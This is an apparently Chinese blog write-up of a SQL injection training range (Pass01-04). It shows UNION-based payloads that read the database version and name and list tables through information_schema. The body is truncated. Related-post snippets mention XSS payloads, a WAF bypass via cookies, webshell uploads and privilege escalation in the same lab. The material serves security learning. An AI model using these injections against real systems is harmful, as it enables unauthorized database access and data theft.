封神台靶场 | 显错注入 | Pass01-04

最新推荐文章于 2024-08-05 22:58:41 发布
最新推荐文章于 2024-08-05 22:58:41 发布
阅读量1k 收藏 2
点赞数 2
分类专栏: 封神台靶场 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fanny0602/article/details/114368167
版权
本文详细介绍了在封神台靶场中进行SQL显错注入的过程,包括Pass01到Pass04的关键步骤。通过 UNION 操作符、LIMIT 子句和 information_schema 数据库获取了error库中的flag和user表信息,揭示了如何利用错误信息进行数据库查询。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

封神台靶场 | 显错注入

题目地址: 掌控安全学院SQL注入靶场

文章目录

      Pass01
         MYSQL补充知识点
         查询所需数据
         查询user表中的内容
      Pass02
      Pass03
      Pass04

任务
通过显错注入获得flag。
对该页面进行GET传参,传参名为id

Pass01

数据库查询语句:

 select * from user where id=1

查询该列数据:表示该列只有3条对应的数据

id=1,id=2,id=3:正确
id=4:No results found(报错)

查询字段数:表示该表只有三列字段

order by 1,order by 2, order by 3 :正确
order by 4 :No results found(报错)

查询数据库版本和当前使用的数据库 :
当前使用的数据库版本:5.6.47 ;
当前使用的数据库:error

id=1 and 1=2 : No results found(报错)
id=1 and 1=2 union select 1, version(),database()
MYSQL补充知识点:
  • UNION
    MySQL UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。(来源:菜鸟教程)
  • LIMIT
    select columnName from tableName limit 0,1
    即是指从表中从第0行开始取数据,取1行。
  • information_schema 库
    在MYSQL中,information_schema 存放着mysql的系统信息。简单介绍一下下面会用到的几个表。
    • SCHEMATA:存放MYSQL中所有的数据库名。
    • TABLES:存放MYSQL中所有的表名,xx库下都有xx表。
    • COLUMNS:存放MYSQL中所有的列名,xx库下的xx表都有xx列。

查询所需数据:
  • error库下的数据表: error_flag 、 user
id=1  and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=
最低0.47元/天 解锁文章
封神台SQL注入-基础靶场1-注入
原味瓜子、的博客
09-28 1470
一、注入 Pass-01 判断注入类型 id=1 //有回 id=1' // No results found 判断为数字型注入 判断有几列 id=1 order by 3 //有回 id=1 order by 4 // No results found 判断有三列 判断回点 id=1 union select 1,2,3 ...
封神台靶场 | 布尔 | Pass05-07
Fanny0602的博客
03-12 1690
封神台靶场 | 布尔 题目地址: 掌控安全学院SQL注入靶场 文章目录       Pass05                    查询步骤       Pass06       Pass07 任务 通过注入获得flag。 对该页面进行GET传参,传参名为id Pass05 数据库查询语句: select * from news where id=1 : 1.查询到的数据只会示有数据/没有结果 2.可以用ASCII进行猜测 查询步骤: 1.数据库名字长度 2.数据库库名 3.
封神台靶场
m0_71518346的博客
10-18 818
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回了2、3、7、8、9。
封神台靶场练习
token_x的博客
08-05 543
封神台靶场练习,未完待补充
封神台DOM XSS靶场
qq_40941912的博客
10-05 1081
作业 DOM XSS靶场 (Rank: 10) 在页面上可填写的地方都输入 Native编码: \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0032\u0033\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e 插入到url中,发现弹窗了: 此处的payload被当作代码执行了 把xss平台
封神台SQL注入-基础靶场1-布尔
原味瓜子、的博客
10-09 1709
1
封神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 1097
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
封神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 2961
封神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
mbp 封神台靶场 一(笔记)
热门推荐
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了封神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
封神台靶场-第六章
Mr_helloword的博客
07-11 1473
第六章-SYSTEM!POWER! Tips: 1、提权! 2、FLAG在C盘根目录下! 1.在第五章的基础上用菜刀连接,根据提示查看flag,发现没有权限,这里想到提权,这是本章重点( :如果中途出现掉线,重新连接菜刀,或重新上传木马连接) 2.上传cmd.exe,iis6.exe文件(在upfile这里上传这俩个文件) 3.打开cmd命令,想法:创建管理员组新用户成员,奈何权限低。 whoami查看当前用户:发现为web应用服务组成员,权限低 我们想到还有一个iis6,我们查看该用户发现为syst
封神台靶场-第五章
Mr_helloword的博客
07-11 1991
第五章- 进击!拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储里将上面的cookie值进行修改: 根据提示信息这
封神台反射型XSS靶场
qq_40941912的博客
10-05 722
作业 反射型XSS靶场 (Rank: 5) 靶场上面是一个输入框,输入查看是否存在xss漏洞: 发现并没有任何反应 查看源码后发现,两个尖括号被替换成html里面用字符表示出来的尖括号: 尖括号被过滤了,然后尝试在输入框内闭合引号,添加onfocus事件: 点击输入框: 触发了onfocus事件,拿到flag{zkaq-xssgood-Q0OA} 提交flag,成功 ...
封神台靶场-第二章
Mr_helloword的博客
07-12 3230
第二章:遇到阻难!绕过WAF过滤 1.查找有无sql注入点利用and 1=1发现做了过滤 使用order by 查字段数发现order by 没有被过滤,最后当字段为10时示正常字段为10 2.因为网页做了waf过略防护,这里我们考虑用cookie注入,可以进行绕过: 这里我们使用一个小工具进行注入(火狐插件) 这款工具可以自定义请求头响应头(Request header,Reponse header) 打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要意的是空
封神台在线靶场——第一章:为了女神小芳!
pigzlfa的博客
10-10 671
sql注入基础版。
封神台靶场 - Kali系列
Hong__Cheng的博客
06-07 767
我在参考 旧目难忘 大佬的文章时。我看到接下来的操作时,有点懵逼了,这么复杂的嘛?不是就是要管理员密码?所以我直接就进入到phpstudy中去找果然,如图的三个文件,文件名中有admin的,我猜测这其中就有我想要的密码,直接下载下来。最近一直在打靶场,这个《Kali渗透 - Sqlmap实操靶场》搞了好久都没搞出来,在网上搜索教程也不多,但今天突然灵光一现找到的flag,特意发出来与大家分享,我也是初学者,耍了点小聪明,不过也算是成功了。我用的Notepad++依次打开这些文件,其中一个是这样的。
封神台sql注入靶场,为了小芳,开冲
Wubuqing的博客
10-27 300
先判断是否存在注入 1=1 返回正常 1=2 返回误 所以存在SQL注入 使用order by 查询该数据表的字段数量 Order by 2 返回正常 order by 3返回误 所以字段数量是2 判断回的位置 Union select 1,2 在 2回 然后查询数据库名 union select 1,database() 得到数据库名为 maoshe 查询路径 union select 1,@@datadir 还有查询数据库版本 Union select 1,version() 然后查询表名
封神台靶场-第三章
Mr_helloword的博客
07-12 2388
第三章:爆破管理员账户登录后台 使用工具:御剑后台扫描,burpsuit 进入网站后想进入管理后台页面,试着在url地址后加/admin常试结果成功了,如果不成功再用工具扫描如下: 登陆后台后使用bp暴力破解模块爆破账户密码(这里我们知道账号密码就不具体演示了): 3.使用bp修改数量价格 flag ...
mbp 封神台靶场 三 (笔记)
qq_43558415的博客
02-09 1157
打开链接,根据提示进行操作由上可知后台登陆地址为admin123,需要准备的工具是大名鼎鼎的burp(抓包软件)
封神台靶场 第一章:为了女神小芳 (SQL注入
m0_65712192的博客
10-14 2134
封神台靶场 第一章:为了女神小芳 (SQL注入
封神台system
最新发布
03-25
### 封神台 SYSTEM 权限获取与相关操作 封神台是一个虚拟化渗透测试靶场,旨在帮助安全研究人员和爱好者提升技能水平。以下是关于如何在封神台中实现 `SYSTEM` 权限的具体过程及相关知识点。 #### 获取 `SYSTEM` 权限的过程 在一个典型的场景下,可以通过以下方式获得目标系统的最高权限: 1. **利用漏洞提权** 如果存在已知的安全漏洞(如 SQL 注入),可以借助这些漏洞执行恶意代码并进一步提升权限[^3]。例如,在某些情况下,攻击者可能通过 WebShell 控制服务器,并尝试寻找本地提权的机会。 2. **使用 exploit 工具** 当发现特定版本的操作系统或软件存在的零日漏洞时,可以直接应用对应的 exploit 脚本来完成提权动作。比如输入命令 `iis6.exe "whoami"` 可验证当前运行身份是否已经切换至 System 用户级别[^2]。 3. **创建新账户加入 Administrators 组** 提升后的下一步通常是新建一个具有完全管理能力的新账号以便后续维护访问需求。此步骤通常涉及 PowerShell 或 CMD 下面的一些指令来新增成员以及将其纳入高级别群组之中。 4. **确认 RDP (Remote Desktop Protocol)** 接下来要做的便是查找远程桌面协议所使用的具体端口号,默认应该是 3389 。这一步骤可通过组合运用 `netstat -ano | findstr :<port>` 和任务列表中的 PID 对应关系得出结论[^5]。 #### 实际案例解析 以第五章为例,“SYSTEM POWER!”章节重点讲述了 webshell 的部署及其带来的潜在危害。其中提到过利用 tasklist 命令配合参数 `-svc` 审查服务进程详情表单里有关 Termservice 的记录编号即为 2408 ,从而间接推测出关联网络接口监听地址可能是标准设定下的 3389 端口。 另外值得意的是第四则参考资料还提及到了一种基于主机名结构拆解的技术手段用于辅助定位内部 IP 地址范围内的其它活动站点链接信息[^4]。 ```bash # 示例代码片段展示如何查询指定条件下的所有连接状况 netstat -ano | findstr ":3389" ``` --- ###
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值